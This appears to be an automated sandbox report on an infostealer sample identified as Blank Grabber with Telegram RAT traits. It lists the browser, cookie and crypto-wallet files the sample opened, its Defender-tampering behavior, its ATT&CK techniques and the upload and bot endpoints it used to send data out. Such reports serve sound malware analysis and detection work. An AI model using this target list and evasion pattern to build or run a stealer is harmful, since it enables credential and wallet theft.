              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.defaultJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeFile read: C:\Users\user\AppData\Local\Temp\? ?\Credentials\Chrome\Chrome Cookies.txt
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3800, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000007.00000003.1686994735.000001E7C3B87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1689633424.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1709310873.000001E7C39E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1275666676.000001FB29EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1275666676.000001FB29EE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1689985178.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3396, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3800, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI33962\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3800, type: MEMORYSTR
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BA450C0 bind,7_2_00007FFB1BA450C0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BA460CC listen,7_2_00007FFB1BA460CC

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		4
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		4
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts2
              Native API              		2
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		11
              Deobfuscate/Decode Files or Information              		1
              Credentials In Files              		3
              File and Directory Discovery              		Remote Desktop Protocol31
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts122
              Command and Scripting Interpreter              		Logon Script (Windows)11
              Process Injection              		21
              Obfuscated Files or Information              		Security Account Manager49
              System Information Discovery              		SMB/Windows Admin Shares1
              Email Collection              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell              		Login Hook2
              Registry Run Keys / Startup Folder              		11
              Software Packing              		NTDS251
              Security Software Discovery              		Distributed Component Object Model1
              Clipboard Data              		5
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp              		LSA Secrets2
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials141
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Modify Registry              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
              Virtualization/Sandbox Evasion              		Proc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584308 Sample: X9g8L63QGs.exe Startdate: 05/01/2025 Architecture: WINDOWS Score: 100 65 ip-api.com 2->65 67 discord.com 2->67 69 blank-ivnd9.in 2->69 83 Sigma detected: Capture Wi-Fi password 2->83 85 Multi AV Scanner detection for submitted file 2->85 87 Yara detected Blank Grabber 2->87 89 12 other signatures 2->89 11 X9g8L63QGs.exe 22 2->11         started        signatures3 process4 file5 55 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->55 dropped 57 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->57 dropped 59 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 11->59 dropped 61 16 other files (none is malicious) 11->61 dropped 107 Modifies Windows Defender protection settings 11->107 109 Adds a directory exclusion to Windows Defender 11->109 111 Removes signatures from Windows Defender 11->111 15 X9g8L63QGs.exe 1 108 11->15         started        signatures6 process7 dnsIp8 71 ip-api.com 208.95.112.1, 49708, 49908, 80 TUT-ASUS United States 15->71 73 discord.com 162.159.137.232, 443, 49913 CLOUDFLARENETUS United States 15->73 75 Found many strings related to Crypto-Wallets (likely being stolen) 15->75 77 Tries to harvest and steal browser information (history, passwords, etc) 15->77 79 Modifies Windows Defender protection settings 15->79 81 4 other signatures 15->81 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 1 15->24         started        26 31 other processes 15->26 signatures9 process10 signatures11 91 Suspicious powershell command line found 19->91 93 Uses cmd line tools excessively to alter registry or file data 19->93 95 Encrypted powershell cmdline option found 19->95 105 2 other signatures 19->105 28 powershell.exe 23 19->28         started        31 conhost.exe 19->31         started        97 Modifies Windows Defender protection settings 22->97 99 Removes signatures from Windows Defender 22->99 33 powershell.exe 22->33         started        43 2 other processes 22->43 35 WMIC.exe 24->35         started        37 conhost.exe 24->37         started        101 Adds a directory exclusion to Windows Defender 26->101 103 Tries to harvest and steal WLAN passwords 26->103 39 getmac.exe 26->39         started        41 powershell.exe 26->41         started        45 60 other processes 26->45 process12 file13 113 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 28->113 115 Writes or reads registry keys via WMI 28->115 117 Loading BitLocker PowerShell Module 28->117 63 C:\Users\user\AppData\...\bexzy300.cmdline, Unicode 45->63 dropped 48 csc.exe 45->48         started        signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\bexzy300.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              X9g8L63QGs.exe47%ReversingLabsWin64.Trojan.Leonem
              X9g8L63QGs.exe67%VirustotalBrowse
              X9g8L63QGs.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\python312.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI33962\unicodedata.pyd0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://api.anonfiles.com/uploadr0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              		162.159.137.232
              		truefalse
                		high
                ip-api.com
                		208.95.112.1
                		truefalse
                  		high
                  blank-ivnd9.in
                  		unknown
                  		unknownfalse
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabX9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://github.com/Blank-c/BlankOBFX9g8L63QGs.exe, 00000007.00000003.1286894963.000001E7C3082000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1287219139.000001E7C29BD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1287263536.000001E7C2D30000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1287314117.000001E7C2D32000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://www.avito.ru/X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/ac/?q=X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://api.gofile.io/getServerrzrX9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2C80000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1289606937.000001E7C2D42000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0X9g8L63QGs.exe, 00000004.00000002.1720049067.000001FB29ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.org/botX9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.ctrip.com/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.leboncoin.fr/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://tools.ietf.org/html/rfc2388#section-4.4X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://weibo.com/X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EBB000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EB4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.anonfiles.com/uploadX9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.msn.comX9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000014.00000002.1488439935.000002452B935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.0000017524565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1499829000.0000017515E59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://discord.com/api/v9/users/X9g8L63QGs.exe, 00000007.00000002.1694449403.000001E7C2A80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963X9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://cacerts.digiX9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://peps.python.org/pep-0205/X9g8L63QGs.exe, 00000007.00000002.1694449403.000001E7C2A80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.reddit.com/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000014.00000002.1444673168.000002451B8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1499829000.00000175144F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.amazon.ca/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKX9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameX9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C2440000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyX9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C2440000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.ebay.co.uk/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000046.00000002.1499829000.0000017515DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000014.00000002.1444673168.000002451BAEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.ebay.de/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000046.00000002.1499829000.0000017515DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeX9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://go.micropowershell.exe, 00000046.00000002.1499829000.00000175156AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerX9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.amazon.com/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://github.com/python/cpython/issues/86361.X9g8L63QGs.exe, 00000007.00000003.1688465803.000001E7C28C2000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290104191.000001E7C2D9F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290046859.000001E7C2E0D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694008349.000001E7C29A2000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C28C6000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691953051.000001E7C29A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://contoso.com/Iconpowershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://httpbin.org/X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sX9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drfalse
                                                                                                      		high
